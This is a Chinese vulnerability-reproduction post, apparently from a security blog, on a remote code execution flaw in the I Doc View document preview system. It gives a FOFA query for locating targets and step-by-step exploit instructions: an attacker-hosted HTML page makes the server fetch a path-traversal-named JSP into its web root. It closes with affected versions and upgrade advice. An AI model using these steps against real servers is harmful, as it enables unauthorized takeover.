免责声明:该文章仅用于技术讨论与学习。请勿利用文章所提供的相关技术从事非法测试,若利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果均与文章作者及本账号无关。
漏洞名称
I Doc View 在线文档预览系统远程代码执行漏洞
漏洞评分
9.8(严重)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/
漏洞详情
I Doc View 在线文档预览系统是由北京卓软在线信息技术有限公司开发的一套系统。主要为用户提供各种类型的文档文件的在线预览,而无需下载或安装相应的软件。
I Doc View 在线文档预览系统存在远程代码执行漏洞,未经身份验证的远程攻击者利用 "/html/2word?url=" 接口可使服务器远程下载恶意文件,从而执行任意代码。
漏洞复现
1. fofa 查询语法:title="I Doc View"
2. I Doc View 页面:
3. 在自己的 VPS 服务器(建议为 linux 服务器)的网站根目录上创建一个名为:
......docviewyjtest.jsp 的文件,内容任意。
注:新建文件时需要转义,具体命令为:vim ..\..\..\docview\yjtest.jsp,然后使用 ls -al 命令查看是否创建成功(由于在文件开头为.默认为隐藏文件,所以使用 ls -al 命令查看)。
4. 接着在自己的 VPS 服务器上新建任意 html 文件,引入我们创建好的 yjtest.jsp 文件即可。
html 文件内容:
<html>
<head>
<meta charset="utf-8">
<title>docviem</title>
</head>
<body>
<link rel="stylesheet" type="text/css" href="http://{自己 VPS 地址}/......docviewyjtest.jsp">
</body>
</html>
4. 然后在 I Doc View 在线文档预览系统上访问路径 :
/html/2word?url={自己VPS服务器上的html文件}。
出现以下情况则已成功将 jsp 文件写入到 I Doc View 在线文档预览系统的根目录。
5. 接着访问:http://127.0.0.1:8084/yjtest.jsp 文件,成功解析该 jsp 文件。
影响版本
I Doc View 在线文档预览系统 < 13.10.1_20231115
安全版本
I Doc View 在线文档预览系统 >= 13.10.1_20231115
修复建议
更新 I Doc View 在线文档预览系统至安全版本:
https://www.idocv.com/
原文始发于微信公众号(蚁剑安全实验室):【漏洞复现】I Doc View 在线文档预览系统远程代码执行漏洞
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论